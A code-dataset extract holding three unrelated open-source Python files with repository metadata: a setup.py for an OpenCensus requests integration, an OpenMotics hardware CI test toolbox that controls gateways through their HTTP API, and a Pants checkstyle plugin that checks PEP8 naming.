census-instrumentation/opencensus-python | contrib/opencensus-ext-requests/setup.py | 1 | 1936 | # Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import find_packages, setup
from version import __version__
setup(
name='opencensus-ext-requests',
version=__version__, # noqa
author='OpenCensus Authors',
author_email='[email protected]',
classifiers=[
'Intended Audience :: Developers',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
description='OpenCensus Requests Integration',
include_package_data=True,
long_description=open('README.rst').read(),
install_requires=[
'opencensus >= 0.8.dev0, < 1.0.0',
'wrapt >= 1.0.0, < 2.0.0',
],
extras_require={},
license='Apache-2.0',
packages=find_packages(exclude=('tests',)),
namespace_packages=[],
url='https://github.com/census-instrumentation/opencensus-python/tree/master/contrib/opencensus-ext-requests', # noqa: E501
zip_safe=False,
)
| apache-2.0 | 4,184,736,613,953,377,000 | 36.960784 | 128 | 0.66374 | false |
openmotics/gateway | testing/cicd/tests/toolbox.py | 1 | 36876 | # Copyright (C) 2020 OpenMotics BV
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import logging
import os
import time
from contextlib import contextmanager
from datetime import datetime
import hypothesis
import requests
import ujson as json
from requests.exceptions import ConnectionError, RequestException, Timeout
from tests.hardware_layout import INPUT_MODULE_LAYOUT, OUTPUT_MODULE_LAYOUT, \
TEMPERATURE_MODULE_LAYOUT, TEST_PLATFORM, TESTER, Input, Module, Output, \
TestPlatform, Shutter, SHUTTER_MODULE_LAYOUT
logger = logging.getLogger(__name__)
if False: # MYPY
from typing import Any, Dict, List, Optional, Tuple, Union
class Client(object):
def __init__(self, id, host, auth=None):
# type: (str, str, List[str]) -> None
self._id = id
self._host = host
self._auth = auth
self._default_kwargs = {'verify': False}
self._token = None # type: Optional[str]
@property
def token(self):
# type: () -> Optional[str]
if self._token is None:
self._token = self.login()
return self._token
def login(self, success=True, timeout=30):
# type: (bool, float) -> Optional[str]
if self._auth:
self._token = None
params = {'username': self._auth[0], 'password': self._auth[1], 'accept_terms': True}
data = self.get('/login', params=params, use_token=False, success=success, timeout=timeout)
if 'token' in data:
return data['token']
else:
raise Exception('unexpected response {}'.format(data))
else:
return None
def get(self, path, params=None, success=True, use_token=True, timeout=30):
# type: (str, Dict[str,Any], bool, bool, float) -> Any
return self._request(requests.get, path, params=params,
success=success, use_token=use_token, timeout=timeout)
def post(self, path, data=None, files=None, success=True, use_token=True, timeout=30):
# type: (str, Dict[str,Any], Dict[str,Any], bool, bool, float) -> Any
return self._request(requests.post, path, data=data, files=files,
success=success, use_token=use_token, timeout=timeout)
def _request(self, f, path, params=None, data=None, files=None, success=True, use_token=True, timeout=30):
# type: (Any, str, Dict[str,Any], Dict[str,Any], Dict[str,Any], bool, bool, float) -> Any
params = params or {}
headers = requests.utils.default_headers()
uri = 'https://{}{}'.format(self._host, path)
if use_token:
headers['Authorization'] = 'Bearer {}'.format(self.token)
# logger.debug('GET {} {} {}'.format(self._id, path, params))
job_name = os.getenv('JOB_NAME')
build_number = os.getenv('BUILD_NUMBER')
if job_name and build_number:
headers['User-Agent'] += ' {}/{}'.format(job_name, build_number)
_, _, current_test = os.getenv('PYTEST_CURRENT_TEST', '').rpartition('::')
if current_test:
headers['User-Agent'] += ' pytest/{}'.format(current_test)
since = time.time()
while since > time.time() - timeout:
try:
response = f(uri, params=params, data=data, files=files,
headers=headers, **self._default_kwargs)
assert response.status_code != 404, 'not found {0}: {1}'.format(path, response.content)
data = response.json()
if success and 'success' in data:
assert data['success'], 'content={}'.format(response.content.decode())
return data
except (ConnectionError, RequestException) as exc:
logger.debug('Request {} {} failed {}, retrying...'.format(self._id, path, exc))
time.sleep(16)
pass
raise Timeout('Request {} {} failed after {:.2f}s'.format(self._id, path, time.time() - since))
class TesterGateway(object):
def __init__(self, client):
# type: (Client) -> None
self._client = client
self._last_received_at = 0.0
self._last_data = {} # type: Dict[str,Any]
self._inputs = {} # type: Dict[int,bool]
self.update_events()
def get_last_outputs(self):
# type: () -> List[str]
if self._last_data:
outputs = self._last_data['events'][-1]['outputs']
return ['?' if x is None else str(x) for x in outputs]
else:
return []
def get(self, path, params=None, success=True, use_token=True):
# type: (str, Dict[str,Any], bool, bool) -> Any
return self._client.get(path, params=params, success=success, use_token=use_token)
def toggle_output(self, output_id, delay=0.2, inverted=False, is_dimmer=False):
self.toggle_outputs([output_id], delay=delay, inverted=inverted, is_dimmer=is_dimmer)
def toggle_outputs(self, output_ids, delay=0.2, inverted=False, is_dimmer=False):
temporarily_state = not inverted
for output_id in output_ids:
payload = {'id': output_id, 'is_on': temporarily_state}
if is_dimmer and temporarily_state:
payload['dimmer'] = 100
self.get('/set_output', payload)
time.sleep(delay)
for output_id in output_ids:
payload = {'id': output_id, 'is_on': not temporarily_state}
if is_dimmer and not temporarily_state:
payload['dimmer'] = 100
self.get('/set_output', payload)
def log_events(self):
# type: () -> None
for event in (x for x in self._last_data['events'] if 'input_id' in x):
received_at, input_id, input_status = (event['received_at'], event['input_id'], event['input_status'])
timestamp = datetime.fromtimestamp(received_at).strftime('%y-%m-%d %H:%M:%S,%f')
logger.error('{} received event {} -> {}'.format(timestamp, input_id, input_status))
def update_events(self):
# type: () -> bool
data = self.get('/plugins/event_observer/events')
self._last_data = data
changed = False
for event in (x for x in self._last_data['events'] if 'input_id' in x):
received_at, input_id, input_status = (event['received_at'], event['input_id'], event['input_status'])
if received_at >= self._last_received_at:
changed = True
self._last_received_at = received_at
self._inputs[input_id] = bool(input_status)
return changed
def reset(self):
# type: () -> None
self._inputs = {}
def receive_input_event(self, entity, input_id, input_status, between):
# type: (Union[Output, Shutter], int, bool, Tuple[float, float]) -> bool
cooldown, deadline = between
timeout = deadline - cooldown
if input_id is None:
raise ValueError('Invalid {} for events, is not connected to a tester input'.format(entity))
if cooldown > 0:
logger.debug('Waiting {:.2f}s before event'.format(cooldown))
self.reset()
time.sleep(cooldown)
since = time.time()
while since > time.time() - timeout:
if input_id in self._inputs and input_status == self._inputs[input_id]:
logger.debug('Received event {} status={} after {:.2f}s'.format(entity, self._inputs[input_id], time.time() - since))
return True
if self.update_events():
continue
time.sleep(0.2)
logger.error('Did not receive event {} status={} after {:.2f}s'.format(entity, input_status, time.time() - since))
self.log_events()
return False
def wait_for_input_status(self, entity, input_id, input_status, timeout):
# type: (Union[Output, Shutter], int, bool, Optional[float]) -> bool
since = time.time()
current_status = None
while timeout is None or since > time.time() - timeout:
data = self.get('/get_input_status')
current_status = {s['id']: s['status'] == 1 for s in data['status']}.get(input_id, None)
if input_status == current_status:
logger.debug('Get status {} status={}, after {:.2f}s'.format(entity, input_status, time.time() - since))
return True
if timeout is None:
break # Immediate check
time.sleep(max(0.2, timeout / 10.0))
logger.error('Get status {} status={} != expected {}, timeout after {:.2f}s'.format(entity, current_status, input_status, time.time() - since))
return False
class Toolbox(object):
def __init__(self):
# type: () -> None
self._tester = None # type: Optional[TesterGateway]
self._dut = None # type: Optional[Client]
self._dut_energy_cts = None # type: Optional[List[Tuple[int, int]]]
@property
def tester(self):
# type: () -> TesterGateway
if self._tester is None:
tester_auth = os.environ['OPENMOTICS_TESTER_AUTH'].split(':')
tester_host = os.environ['OPENMOTICS_TESTER_HOST']
self._tester = TesterGateway(Client('tester', tester_host, auth=tester_auth))
return self._tester
@property
def dut(self):
# type: () -> Client
if self._dut is None:
dut_auth = os.environ['OPENMOTICS_DUT_AUTH'].split(':')
dut_host = os.environ['OPENMOTICS_DUT_HOST']
self._dut = Client('dut', dut_host, auth=dut_auth)
return self._dut
@property
def dut_energy_cts(self):
if self._dut_energy_cts is None:
cts = []
energy_modules = self.list_energy_modules(module_type='E')
for module in energy_modules:
cts += [(module['id'], input_id) for input_id in range(12)]
self._dut_energy_cts = cts
return self._dut_energy_cts
def initialize(self):
# type: () -> None
logger.info('checking prerequisites')
self.ensure_power_on()
try:
self.dut.login(success=False)
except Exception:
logger.info('initializing gateway...')
self.authorized_mode_start()
self.create_or_update_user()
self.dut.login()
# For now, while some code knows the difference between emulated, physical, virtual, ..., the code will mainly work
# using the i, O, s, ... letters instead (so virtual and non-virtual).
# TODO: Change this in the future, as it needs a new API call on the GW.
expected_modules = {Module.HardwareType.VIRTUAL: {},
Module.HardwareType.PHYSICAL: {}} # Limit it to physical and virtual for now
for module in OUTPUT_MODULE_LAYOUT + INPUT_MODULE_LAYOUT + TEMPERATURE_MODULE_LAYOUT + SHUTTER_MODULE_LAYOUT:
hardware_type = Module.HardwareType.VIRTUAL if module.hardware_type == Module.HardwareType.VIRTUAL else Module.HardwareType.PHYSICAL
if module.mtype not in expected_modules[hardware_type]:
expected_modules[hardware_type][module.mtype] = 0
expected_modules[hardware_type][module.mtype] += 1
logger.info('Expected modules: {0}'.format(expected_modules))
missing_modules = set()
modules = self.count_modules('master')
logger.info('Current modules: {0}'.format(modules))
for mtype, expected_amount in expected_modules[Module.HardwareType.PHYSICAL].items():
if modules.get(mtype, 0) == 0:
missing_modules.add(mtype)
modules_info = self.list_modules()['master'].values()
if not any(v['type'] == 'C' for v in modules_info):
missing_modules.add('C')
if not any(v['type'] == 'I' and v['is_can'] for v in modules_info):
missing_modules.add('C')
if missing_modules:
logger.info('Discovering modules...')
self.discover_modules(output_modules='O' in missing_modules,
input_modules='I' in missing_modules,
shutter_modules='R' in missing_modules,
dimmer_modules='D' in missing_modules,
temp_modules='T' in missing_modules,
can_controls='C' in missing_modules,
ucans='C' in missing_modules)
modules = self.count_modules('master')
logger.info('Discovered modules: {0}'.format(modules))
for mtype, expected_amount in expected_modules[Module.HardwareType.PHYSICAL].items():
assert modules.get(mtype, 0) == expected_amount, 'Expected {0} modules {1}'.format(expected_amount, mtype)
try:
for mtype, expected_amount in expected_modules[Module.HardwareType.VIRTUAL].items():
assert modules.get(mtype, 0) >= expected_amount
except Exception:
logger.info('Adding virtual modules...')
for mtype, expected_amount in expected_modules[Module.HardwareType.VIRTUAL].items():
extra_needed_amount = expected_amount - modules.get(mtype, 0)
assert extra_needed_amount > 0
self.add_virtual_modules(module_amounts={mtype: extra_needed_amount})
modules = self.count_modules('master')
logger.info('Virtual modules: {0}'.format(modules))
for mtype, expected_amount in expected_modules[Module.HardwareType.VIRTUAL].items():
assert modules.get(mtype, 0) >= expected_amount
# TODO ensure discovery synchonization finished.
for module in OUTPUT_MODULE_LAYOUT:
if module.outputs:
self.ensure_output_exists(module.outputs[-1], timeout=300)
for module in INPUT_MODULE_LAYOUT:
if module.inputs:
self.ensure_input_exists(module.inputs[-1], timeout=300)
for module in SHUTTER_MODULE_LAYOUT:
if module.shutters:
self.ensure_shutter_exists(module.shutters[-1], timeout=300)
def print_logs(self):
# type: () -> None
try:
data = self.tester.get('/plugins/syslog_receiver/logs', success=False)
for log in data['logs']:
print(log)
except Exception:
print('Failed to retrieve logs')
def factory_reset(self, confirm=True):
# type: (bool) -> Dict[str,Any]
assert self.dut._auth
logger.debug('factory reset')
params = {'username': self.dut._auth[0], 'password': self.dut._auth[1], 'confirm': confirm, 'can': False}
return self.dut.get('/factory_reset', params=params, success=confirm)
def list_modules(self):
# type: () -> Dict[str, Any]
return self.dut.get('/get_modules_information')['modules']
def count_modules(self, category):
modules = {}
for address, info in self.list_modules()[category].items():
if info['type'] not in modules:
modules[info['type']] = 0
modules[info['type']] += 1
return modules
def assert_modules(self, module_type, min_modules=1):
# type: (str, int) -> List[Dict[str, Any]]
data = self.list_modules()
modules = []
for address, info in data['master'].items():
if info['type'] != module_type:
continue
modules.append(info)
assert len(modules) >= min_modules, 'Not enough modules of type \'{}\' available in {}'.format(module_type, data)
return modules
def list_energy_modules(self, module_type, min_modules=1):
# type: (str, int) -> List[Dict[str, Any]]
data = self.list_modules()
modules = []
for address, info in data['energy'].items():
if info['type'] != module_type or not info['firmware']:
continue
modules.append(info)
assert len(modules) >= min_modules, 'Not enough energy modules of type \'{}\' available in {}'.format(module_type, data)
return modules
def authorized_mode_start(self):
# type: () -> None
logger.debug('start authorized mode')
self.tester.toggle_outputs(TESTER.Buttons.dut, delay=15)
def authorized_mode_stop(self):
# type: () -> None
self.tester.toggle_outputs(TESTER.Buttons.dut)
def create_or_update_user(self, success=True):
# type: (bool) -> None
logger.info('create or update test user')
assert self.dut._auth
user_data = {'username': self.dut._auth[0], 'password': self.dut._auth[1]}
self.dut.get('/create_user', params=user_data, use_token=False, success=success)
def get_gateway_version(self):
# type: () -> str
return self.dut.get('/get_version')['gateway']
def get_firmware_versions(self):
# type: () -> Dict[str,str]
modules = self.dut.get('/get_modules_information')['modules']['master']
versions = {'M': self.dut.get('/get_status')['version']}
for data in (x for x in modules.values() if 'firmware' in x):
module = 'C' if data.get('is_can', False) else data['type']
versions[module] = data['firmware']
return versions
def module_discover_start(self):
# type: () -> None
logger.debug('start module discover')
self.dut.get('/module_discover_start')
for _ in range(10):
data = self.dut.get('/module_discover_status')
if data['running']:
return
time.sleep(0.2)
def module_discover_stop(self):
# type: () -> None
logger.debug('stop module discover')
self.dut.get('/module_discover_stop')
def discover_modules(self, output_modules=False, input_modules=False, shutter_modules=False, dimmer_modules=False, temp_modules=False, can_controls=False, ucans=False, timeout=120):
# TODO: Does not work yet for the Core(+) as they don't have this call implemented.
logger.debug('Discovering modules')
since = time.time()
# [WIP] tried to disable ucan logic for the factory reset test (CAN FX call)
# but it did not enable us to check the behaviour
if ucans:
ucan_inputs = []
for module in INPUT_MODULE_LAYOUT:
if module.is_can:
ucan_inputs += module.inputs
logger.debug('Toggle uCAN inputs %s', ucan_inputs)
for ucan_input in ucan_inputs:
self.tester.toggle_output(ucan_input.tester_output_id, delay=0.5)
time.sleep(0.5)
time.sleep(0.5) # Give a brief moment for the CC to settle
new_modules = []
self.clear_module_discovery_log()
self.module_discover_start()
try:
addresses = []
if output_modules:
self.tester.toggle_output(TESTER.Button.output, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'O': 1}, addresses=addresses)
if shutter_modules:
self.tester.toggle_output(TESTER.Button.shutter, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'R': 1}, addresses=addresses)
if input_modules:
self.tester.toggle_output(TESTER.Button.input, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'I': 1}, addresses=addresses)
if dimmer_modules:
self.tester.toggle_output(TESTER.Button.dimmer, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'D': 1}, addresses=addresses)
if temp_modules:
self.tester.toggle_output(TESTER.Button.temp, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'T': 1}, addresses=addresses)
if can_controls or ucans:
self.tester.toggle_output(TESTER.Button.can, delay=0.5)
module_amounts = {'C': 1}
if ucans:
module_amounts.update({'I': 1, 'T': 1})
new_modules += self.watch_module_discovery_log(module_amounts=module_amounts, addresses=addresses)
new_module_addresses = set(module['address'] for module in new_modules)
finally:
self.module_discover_stop()
while since > time.time() - timeout:
data = self.dut.get('/get_modules_information')
synced_addresses = set(data['modules']['master'].keys())
if new_module_addresses.issubset(synced_addresses):
return True
raise AssertionError('Did not discover required modules')
def add_virtual_modules(self, module_amounts, timeout=120):
since = time.time()
desired_new_outputs = module_amounts.get('o', 0)
desired_new_inputs = module_amounts.get('i', 0)
def _get_current_virtual_modules():
virtual_modules = {}
data = self.dut.get('/get_modules_information')
for entry in data['modules']['master'].values():
if entry['is_virtual']:
virtual_modules.setdefault(entry['type'], set()).add(entry['address'])
return virtual_modules
previous_virtual_modules = _get_current_virtual_modules()
for _ in range(desired_new_outputs):
self.dut.get('/add_virtual_output_module')
time.sleep(2)
for _ in range(desired_new_inputs):
self.dut.get('/add_virtual_input_module')
time.sleep(2)
# TODO: We should/could use the module discover log as well, but adding virtual modules isn't generate events
new_outputs, new_inputs = (0, 0)
while since > time.time() - timeout:
current_virtual_modules = _get_current_virtual_modules()
new_outputs = len(current_virtual_modules.get('o', set()) - previous_virtual_modules.get('o', set()))
new_inputs = len(current_virtual_modules.get('i', set()) - previous_virtual_modules.get('i', set()))
if new_outputs == desired_new_outputs and new_inputs == desired_new_inputs:
return True
time.sleep(5)
raise AssertionError('Did not discover required virtual modules, outputs: %s inputs: %s', new_outputs, new_inputs)
def clear_module_discovery_log(self):
self.dut.get('/get_module_log')
def watch_module_discovery_log(self, module_amounts, timeout=10, addresses=None):
# type: (Dict[str, int], float, Optional[List[str]]) -> List[Dict[str, Any]]
def format_module_amounts(amounts):
return ', '.join('{}={}'.format(mtype, amount) for mtype, amount in amounts.items())
since = time.time()
all_entries = []
desired_entries = []
found_module_amounts = {}
if addresses is None:
addresses = []
while since > time.time() - timeout:
log = self.dut.get('/get_module_log')['log']
# Log format: {'code': '<NEW|EXISTING|DUPLCATE|UNKNOWN>',
# 'module_nr': <module number in its category>,
# 'category': '<SHUTTER|INTPUT|OUTPUT>',
# 'module_type': '<I|O|T|D|i|o|t|d|C>,
# 'address': '<module address>'}
all_entries += log
for entry in log:
if entry['code'] in ['DUPLICATE', 'UNKNOWN']:
continue
module_type = entry['module_type']
if module_type not in module_amounts:
continue
address = entry['address']
if address not in addresses:
addresses.append(address)
if module_type not in found_module_amounts:
found_module_amounts[module_type] = 0
found_module_amounts[module_type] += 1
desired_entries.append(entry)
logger.debug('Discovered {} module: {} ({})'.format(entry['code'],
entry['module_type'],
entry['address']))
if found_module_amounts == module_amounts:
logger.debug('Discovered required modules: {}'.format(format_module_amounts(found_module_amounts)))
return desired_entries
time.sleep(2)
raise AssertionError('Did not discover required modules: {}. Raw log: {}'.format(
format_module_amounts(module_amounts), all_entries
))
def discover_energy_module(self):
# type: () -> None
self.tester.get('/set_output', {'id': TESTER.Power.bus2, 'is_on': True})
time.sleep(5)
try:
logger.debug('discover Energy module')
self.dut.get('/start_power_address_mode')
self.tester.toggle_output(TESTER.Button.energy, 1.0)
self.assert_energy_modules(1, timeout=60)
finally:
self.dut.get('/stop_power_address_mode')
def assert_energy_modules(self, count, timeout=30):
# type: (int, float) -> List[List[str]]
since = time.time()
modules = []
while since > time.time() - timeout:
modules += self.dut.get('/get_modules_information')['modules']
if len(modules) >= count:
logger.debug('discovered {} modules, done'.format(count))
return modules
time.sleep(2)
raise AssertionError('expected {} modules in {}'.format(count, modules))
def power_off(self):
# type: () -> None
logger.debug('power off')
self.tester.get('/set_output', {'id': TESTER.Power.dut, 'is_on': False})
time.sleep(2)
def ensure_power_on(self):
# type: () -> None
if not self.health_check(timeout=0.2, skip_assert=True):
return
logger.info('power on')
if TEST_PLATFORM == TestPlatform.CORE_PLUS:
timeout = 600 # After a potential factory reset, the Core+ has to wipe a lot more EEPROM and is therefore slower
else:
timeout = 300
self.tester.get('/set_output', {'id': TESTER.Power.dut, 'is_on': True})
logger.info('waiting for gateway api to respond...')
self.health_check(timeout=timeout)
logger.info('health check done')
@contextmanager
def disabled_self_recovery(self):
try:
self.dut.get('/set_self_recovery', {'active': False})
yield self
finally:
self.dut.get('/set_self_recovery', {'active': True})
def health_check(self, timeout=30, skip_assert=False):
# type: (float, bool) -> List[str]
since = time.time()
pending = ['unknown']
while since > time.time() - timeout:
try:
data = self.dut.get('/health_check', use_token=False, success=False, timeout=5)
pending = [k for k, v in data['health'].items() if not v['state']]
if not pending:
return pending
logger.debug('wait for health check, {}'.format(pending))
except Exception:
pass
time.sleep(10)
if not skip_assert:
assert pending == []
return pending
def module_error_check(self):
# type: () -> None
data = self.dut.get('/get_errors')
for module, count in data['errors']:
# TODO just fail?
if count != 0:
logger.warning('master reported errors {} {}'.format(module, count))
def configure_output(self, output, config):
# type: (Output, Dict[str,Any]) -> None
config_data = {'id': output.output_id}
config_data.update(**config)
logger.debug('configure output {} with {}'.format(output, config))
self.dut.get('/set_output_configuration', {'config': json.dumps(config_data)})
def ensure_output(self, output, status, config=None):
# type: (Output, int, Optional[Dict[str,Any]]) -> None
if config:
self.configure_output(output, config)
hypothesis.note('ensure output {} is {}'.format(output, status))
logger.debug('ensure output {} is {}'.format(output, status))
time.sleep(0.2)
self.set_output(output, status)
time.sleep(0.2)
self.tester.reset()
def set_output(self, output, status):
# type: (Output, int) -> None
logger.debug('set output {} -> {}'.format(output, status))
self.dut.get('/set_output', {'id': output.output_id, 'is_on': status})
def configure_shutter(self, shutter, config):
# type: (Shutter, Dict[str, Any]) -> None
config_data = {'id': shutter.shutter_id}
config_data.update(**config)
logger.debug('configure shutter {} with {}'.format(shutter, config))
self.dut.get('/set_shutter_configuration', {'config': json.dumps(config_data)})
def set_shutter(self, shutter, direction):
# type: (Shutter, str) -> None
self.dut.get('/do_shutter_{}'.format(direction), {'id': shutter.shutter_id})
def lock_shutter(self, shutter, locked):
# type: (Shutter, bool) -> None
self.dut.get('/do_basic_action', {'action_type': 113, 'action_number': 1 if locked else 0})
def press_input(self, _input):
# type: (Input) -> None
self.tester.get('/set_output', {'id': _input.tester_output_id, 'is_on': False}) # ensure start status
time.sleep(0.2)
self.tester.reset()
hypothesis.note('After input {} pressed'.format(_input))
self.tester.toggle_output(_input.tester_output_id, is_dimmer=_input.is_dimmer)
logger.debug('Toggled {} -> True -> False'.format(_input))
def assert_shutter_changed(self, shutter, from_status, to_status, timeout=5, inverted=False):
# type: (Shutter, str, str, float) -> None
hypothesis.note('assert {} status changed {} -> {}'.format(shutter, from_status, to_status))
input_id_up = shutter.tester_input_id_down if inverted else shutter.tester_input_id_up
input_id_down = shutter.tester_input_id_up if inverted else shutter.tester_input_id_down
start = time.time()
self.assert_shutter_status(shutter=shutter,
status=to_status,
timeout=timeout,
inverted=inverted)
if from_status != to_status:
up_ok = True
if (from_status == 'going_up') != (to_status == 'going_up'):
up_ok = self.tester.receive_input_event(entity=shutter,
input_id=input_id_up,
input_status=to_status == 'going_up',
between=(0, Toolbox._remaining_timeout(timeout, start)))
down_ok = True
if (from_status == 'going_down') != (to_status == 'going_down'):
down_ok = self.tester.receive_input_event(entity=shutter,
input_id=input_id_down,
input_status=to_status == 'going_down',
between=(0, Toolbox._remaining_timeout(timeout, start)))
if not up_ok or not down_ok:
raise AssertionError('expected events {} status={}, up_ok={}, down_ok={}'.format(shutter, to_status, up_ok, down_ok))
def assert_output_changed(self, output, status, between=(0, 5)):
# type: (Output, bool, Tuple[float,float]) -> None
hypothesis.note('assert {} status changed {} -> {}'.format(output, not status, status))
if self.tester.receive_input_event(entity=output,
input_id=output.tester_input_id,
input_status=status,
between=between):
return
raise AssertionError('expected event {} status={}'.format(output, status))
def assert_output_status(self, output, status, timeout=5):
# type: (Output, bool, float) -> None
hypothesis.note('assert output {} status is {}'.format(output, status))
if self.tester.wait_for_input_status(entity=output,
input_id=output.tester_input_id,
input_status=status,
timeout=timeout):
return
raise AssertionError('Expected {} status={}'.format(output, status))
def assert_shutter_status(self, shutter, status, timeout=5, inverted=False):
# type: (Shutter, str, float) -> None
input_id_up = shutter.tester_input_id_down if inverted else shutter.tester_input_id_up
input_id_down = shutter.tester_input_id_up if inverted else shutter.tester_input_id_down
start = time.time()
up_ok = self.tester.wait_for_input_status(entity=shutter,
input_id=input_id_up,
input_status=status == 'going_up',
timeout=Toolbox._remaining_timeout(timeout, start))
down_ok = self.tester.wait_for_input_status(entity=shutter,
input_id=input_id_down,
input_status=status == 'going_down',
timeout=Toolbox._remaining_timeout(timeout, start))
if not up_ok or not down_ok:
raise AssertionError('Expected {} status={}, up_ok={}, down_ok={}'.format(shutter, status, up_ok, down_ok))
def ensure_output_exists(self, output, timeout=30):
# type: (Output, float) -> None
since = time.time()
while since > time.time() - timeout:
data = self.dut.get('/get_output_status')
try:
next(x for x in data['status'] if x['id'] == output.output_id)
logger.debug('output {} with status discovered, after {:.2f}s'.format(output, time.time() - since))
return
except StopIteration:
pass
time.sleep(2)
raise AssertionError('output {} status missing, timeout after {:.2f}s'.format(output, time.time() - since))
def ensure_shutter_exists(self, _shutter, timeout=30):
# type: (Shutter, float) -> None
since = time.time()
while since > time.time() - timeout:
data = self.dut.get('/get_shutter_status')
if str(_shutter.shutter_id) in data['detail']:
logger.debug('shutter {} with status discovered, after {:.2f}s'.format(_shutter, time.time() - since))
return
time.sleep(2)
raise AssertionError('shutter {} status missing, timeout after {:.2f}s'.format(_shutter, time.time() - since))
def ensure_input_exists(self, _input, timeout=30):
# type: (Input, float) -> None
since = time.time()
while since > time.time() - timeout:
data = self.dut.get('/get_input_status')
try:
next(x for x in data['status'] if x['id'] == _input.input_id)
logger.debug('input {} with status discovered, after {:.2f}s'.format(_input, time.time() - since))
return
except StopIteration:
pass
time.sleep(2)
raise AssertionError('input {} status missing, timeout after {:.2f}s'.format(_input, time.time() - since))
@staticmethod
def _remaining_timeout(timeout, start):
return timeout - time.time() + start
| agpl-3.0 | 4,625,946,587,529,712,000 | 46.337612 | 185 | 0.566764 | false |
foursquare/pants | contrib/python/src/python/pants/contrib/python/checks/tasks/checkstyle/variable_names.py | 1 | 4706 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import ast
import keyword
import re
from functools import wraps
import six
from pants.contrib.python.checks.tasks.checkstyle.common import CheckstylePlugin
ALL_LOWER_CASE_RE = re.compile(r'^[a-z][a-z\d]*$')
ALL_UPPER_CASE_RE = re.compile(r'^[A-Z][A-Z\d]+$')
LOWER_SNAKE_RE = re.compile(r'^([a-z][a-z\d]*)(_[a-z\d]+)*$')
UPPER_SNAKE_RE = re.compile(r'^([A-Z][A-Z\d]*)(_[A-Z\d]+)*$')
UPPER_CAMEL_RE = re.compile(r'^([A-Z][a-z\d]*)+$')
RESERVED_NAMES = frozenset(keyword.kwlist)
BUILTIN_NAMES = dir(six.moves.builtins)
def allow_underscores(num):
def wrap(function):
@wraps(function)
def wrapped_function(name):
if name.startswith('_' * (num + 1)):
return False
return function(name.lstrip('_'))
return wrapped_function
return wrap
@allow_underscores(1)
def is_upper_camel(name):
"""UpperCamel, AllowingHTTPAbbrevations, _WithUpToOneUnderscoreAllowable."""
return bool(UPPER_CAMEL_RE.match(name) and not ALL_UPPER_CASE_RE.match(name))
@allow_underscores(2)
def is_lower_snake(name):
"""lower_snake_case, _with, __two_underscores_allowable."""
return LOWER_SNAKE_RE.match(name) is not None
def is_reserved_name(name):
return name in BUILTIN_NAMES or name in RESERVED_NAMES
def is_reserved_with_trailing_underscore(name):
"""For example, super_, id_, type_"""
if name.endswith('_') and not name.endswith('__'):
return is_reserved_name(name[:-1])
return False
def is_builtin_name(name):
"""For example, __foo__ or __bar__."""
if name.startswith('__') and name.endswith('__'):
return ALL_LOWER_CASE_RE.match(name[2:-2]) is not None
return False
@allow_underscores(2)
def is_constant(name):
return UPPER_SNAKE_RE.match(name) is not None
class PEP8VariableNames(CheckstylePlugin):
"""Enforces PEP8 recommendations for variable names.
Specifically:
UpperCamel class names
lower_snake / _lower_snake / __lower_snake function names
lower_snake expression variable names
CLASS_LEVEL_CONSTANTS = {}
GLOBAL_LEVEL_CONSTANTS = {}
"""
CLASS_GLOBAL_BUILTINS = frozenset((
'__slots__',
'__metaclass__',
))
def iter_class_methods(self, class_node):
for node in class_node.body:
if isinstance(node, ast.FunctionDef):
yield node
def iter_class_globals(self, class_node):
for node in class_node.body:
# TODO(wickman) Occasionally you have the pattern where you set methods equal to each other
# which should be allowable, for example:
# class Foo(object):
# def bar(self):
# pass
# alt_bar = bar
if isinstance(node, ast.Assign):
for name in node.targets:
if isinstance(name, ast.Name):
yield name
def nits(self):
class_methods = set()
all_methods = set(function_def for function_def in ast.walk(self.python_file.tree)
if isinstance(function_def, ast.FunctionDef))
for class_def in self.iter_ast_types(ast.ClassDef):
if not is_upper_camel(class_def.name):
yield self.error('T000', 'Classes must be UpperCamelCased', class_def)
for class_global in self.iter_class_globals(class_def):
if not is_constant(class_global.id) and class_global.id not in self.CLASS_GLOBAL_BUILTINS:
yield self.error('T001', 'Class globals must be UPPER_SNAKE_CASED', class_global)
if not class_def.bases or all(isinstance(base, ast.Name) and base.id == 'object'
for base in class_def.bases):
class_methods.update(self.iter_class_methods(class_def))
else:
# If the class is inheriting from anything that is potentially a bad actor, rely
# upon checking that bad actor out of band. Fixes PANTS-172.
for method in self.iter_class_methods(class_def):
all_methods.discard(method)
for function_def in all_methods - class_methods:
if is_reserved_name(function_def.name):
yield self.error('T801', 'Method name overrides a builtin.', function_def)
# TODO(wickman) Only enforce this for classes that derive from object. If they
# don't derive object, it's possible that the superclass naming is out of its
# control.
for function_def in all_methods:
if not any((is_lower_snake(function_def.name),
is_builtin_name(function_def.name),
is_reserved_with_trailing_underscore(function_def.name))):
yield self.error('T002', 'Method names must be lower_snake_cased', function_def)
